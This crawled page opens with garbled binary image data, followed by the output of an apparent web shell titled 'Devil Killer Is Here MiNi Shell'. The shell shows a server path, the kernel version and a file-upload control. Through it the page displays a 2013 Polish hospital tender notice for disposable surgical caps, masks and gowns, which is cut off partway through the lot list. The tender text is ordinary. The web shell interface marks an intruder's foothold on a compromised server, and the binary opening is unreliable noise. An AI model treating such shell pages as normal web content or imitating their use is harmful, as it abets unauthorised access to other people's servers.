JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130205/48226-N-2013.html

<p class="kh_header"><b>Inowrocław: Przetarg na dostawę art. z włókniny jednorazowego użytku</b><br>
<b>Numer ogłoszenia: 48226 - 2013; data zamieszczenia: 05.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczny Specjalistyczny Zakład Opieki Zdrowotnej , ul. Poznańska 97, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 052 3545587, faks 052 3574667.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pszozino.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg na dostawę art. z włókniny jednorazowego użytku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> P r z e d m i o t e m zamówienia jest  dostawa  artykułów  z włókniny jednorazowego użytku, opisanego w Załączniku  Nr 2 do SIWZ.

Postępowanie, którego dotyczy niniejszy dokument oznaczone jest znakiem                           sprawy  M-5/2013 
Przedmiot zamówienia został podzielony i opisany w 24 pozycjach asortymentowych.
Każda pozycja  stanowi odrębny przedmiot zamówienia.
Zamówienie  może być realizowane  w ramach wybranej pozycji  lub dla
całości zamówienia ;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.34.00-3, 33.14.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 24.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w  następujących kwotach:

pozycja  nr 1-   96,00 zł
pozycja  nr 2- 300,00zł  
pozycja  nr 3-180,00 zł
pozycja  nr 4-480,00 zł   
pozycja  nr 5-  39,00 zł
pozycja  nr 6-  63,00 zł  
pozycja  nr 7-  21,00 zł
pozycja  nr 8-    6,00 zł
pozycja  nr 9-    7,00 zł
pozycja  nr 10-  36,00 zł
pozycja  nr 11- 78,00 zł
pozycja  nr 12-290,00 zł
pozycja  nr 13-  30,00 zł
pozycja  nr 14- 160,00 zł
pozycja  nr 15-  60,00 zł
pozycja  nr 16-    9,00 zł 
pozycja  nr 17-    9,00 zł
pozycja  nr 18- 90,00 zł
pozycja  nr 19-340,00 zł
pozycja  nr 20-100,00 zł
pozycja  nr 21-450,00 zł
pozycja  nr 22-100,00 zł
pozycja  nr 23-120,00 zł
pozycja  nr 24-160,00 zł
1.  Miejsce wnoszenia wadium w pieniądzu na wskazany rachunek bankowy:
     - Bank :  Kredyt Bank   S.A. O/Bydgoszcz
    Nr rachunku: 88150013601213600244300000 
2. Wadium wnoszone w pieniądzu można wpłacać przelewem na wskazane konto.
3. Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do 
    oferty. 
4. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji 
    ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju,
    Przedsiębiorczości, należy dołączyć do oferty w formie nienaruszonego oryginału lub
    zdeponować w kasie u Zamawiającego, a kopię załączyć do oferty.
5. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób
    reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego 
   (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób
   umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny
   (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na
   każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, 
   zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium 
   w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych. 
6. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert  
    tj. do dnia   15.02.2013r. godz. 9:30
 7. Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą
     wadium w wyznaczonym terminie zostanie wykluczony z postępowania.
 8. Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów wykonawców,
      Zamawiający przekaże do banku niezwłocznie po:
a) wyborze najkorzystniejszej oferty, unieważnieniu postępowania o udzielenie niniejszego zamówienia    publicznego, za wyjątkiem Wykonawcy  , którego oferta została uznana za najkorzystniejszą -z zastrzeżeniem art. 46  ust. 4 a ustawy Pzp. oraz niezwłocznie  na wniosek Wykonawcy , który wycofał ofertę przed upływem  terminu      spływania ofert. 
b) zawarciu umowy w sprawie zamówienia publicznego.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni , że wynika to z przyczyn nie leżących  po jego stronie.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta zostanie wybrana:
      a) odmówi podpisania umowy  na warunkach określonych w ofercie,
      b) zawarcie umowy  w sprawie zamówienia publicznego stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia określonego w części III SIWZ ubiegać się wykonawcy którzy:

a) nie podlegają wykluczeniu na podstawie przepisów art. 24 ust. 1 i 2 ustawy Pzp ,
b) spełniają warunki określone przepisami art. 22 ust. 1 pkt 1-4 ustawy Pzp 
c) zrealizowali w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres działalności jest krótszy - w tym okresie przynajmniej dwie dostawy artykułów z włókniny jednorazowego użytku , odpowiadające wartości pozycji na które składana jest oferta.
  Zamawiający   dokona oceny spełniania warunków na podstawie dokumentów
  dołączonych celem ich wykazania wymienionych w pkt. IX.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie dokumentów potwierdzających  zrealizowane i realizowane dostawy w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, w tym 2 dostawy odpowiadające swoją wartością  pozycji na którą składana jest oferta z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, dokumenty potwierdzające, że usługi objęte wykazem, o którym mowa wyżej, zostały wykonane należycie;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)	Wpis  lub zgłoszenie do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania ( nie dotyczy klasy wyrobu medycznego I i IIa  pod warunkiem, że pierwsze jego wprowadzenie nastąpiło w innym niż Polska kraju Unii Europejskiej, zgodnie z przepisami ustawy z dnia 20 maja  2010r. o wyrobach   medycznych - Dz.U. Nr 107, poz.679 z 17 czerwca 2010r. ).
b)	Deklaracja zgodności producenta ( dotyczy wszystkich klas wyrobu medycznego ).
c)	Certyfikat CE wystawiony przez  jednostkę notyfikowaną . Na certyfikacie  musi być numer CE i pełne dane jednostki notyfikowanej( nie dotyczy klasy wyrobu I ).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	 wypełniony formularz  -Oferta (zał. nr 1 i 2 )
b)	 dowód wniesienia wadium,
c)   dokument, z którego wynika upoważnienie do podpisywania oferty lub pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli  osobą podpisującą nie jest osoba upoważniona na podstawie wpisu z rejestru handlowego lub zaświadczenia o prowadzeniu działalności gospodarczej. Jeżeli pełnomocnictwo nie ma postaci aktu notarialnego powinno zawierać pieczęć Wykonawcy, imienną pieczątkę wystawiającego pełnomocnictwo i jego podpis,
 d)   opis części zamówienia, która zostanie powierzona podwykonawcy (jeżeli dotyczy), 
       e)  w przypadku  gdy Wykonawca będzie polegać na wiedzy, doświadczeniu innych  podmiotów przedstawi w tym celu  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji  niezbędnych zasobów na okres korzystania  z nich przy wykonywaniu zamówienia,


f)  próbki wraz z dokładnym opisem  (charakterystyką) w ilości:

5 sztuk-  zadanie nr 1,2,3,7
2 sztuki-zadanie nr 4,5,9,10,11
1 sztuka-zadanie nr 6,8,12,13,14,15,16,17,18,19,20,21,22,23,24

Próbki należy przedłożyć do dnia 15.02.2013r. do godz. 9:30</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - Jakość - 35</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pszozino.lo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczny Specjalistyczny Zakład Opieki Zdrowotnej w Inowrocławiu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2013 godzina 09:30, miejsce: w Sekretariacie Głównego Specjalisty ds. Techniczno-Administracyjnych - Publiczny Specjalistyczny Zakład Opieki  Zdrowotnej, ul. Poznańska 97, 88-100 Inowrocław..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pozycja nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uniwersalny czepek chirurgiczny w formie beretu z włókniny posiadającej perforowaną strukturę o wysokiej przepuszczalności powietrza , masa włókniny min. 14 g / m2 , zielony o głębokości min. 10 cm o śr. 30 cm a 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> pozycja nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czepek chirurgiczny typu furażerka, wiązany z tyłu na troki,  z włókniny posiadającej perforowaną strukturę o wysokiej przepuszczalności powietrza , masa włókniny min. 25 g / m2 , głębokość min. 21 cm , zielony a`100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pozycja nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maska chirurgiczna, wiązana na troki o wysokiej przepuszczalności powietrza wykonana z trzech warstw włókniny z filtrem, posiadająca wbudowaną wkładkę umożliwiającą dopasowanie maski do twarzy o dł. min. 12 cm ,  w rozm. min. 175 mm x 100 mm , długość troków górnych min. 43 cm , długość troków dolnych min. 36 cm  Maska Przeznaczona dla użytkowników o szczególnie wrażliwej skórze. EN 14683  ( typ II ) a 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pozycja nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fartuch jednorazowy wiązany u góry i w pasie z mankietem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> pozycja nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fartuch foliowy , uniwersalny , wykonany z miękkiej jasnoniebieskiej folii , wzmocniony i wydłużony , rozm. XL.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> pozycja nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fartuch sterylny, chirurgiczny pełnobarierowy zgodny z EN 13795 1-3 , wykonany z włókniny SMS o gramaturze min. 40 g / m2, rękawy wykończone 100 % poliester , wiązany na troki , łączenie kartonikiem , długość min. 125 cm , odporny na przenikanie płynów 34,7 cm H2O.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> pozycja nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ochraniacze na buty - z folii.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
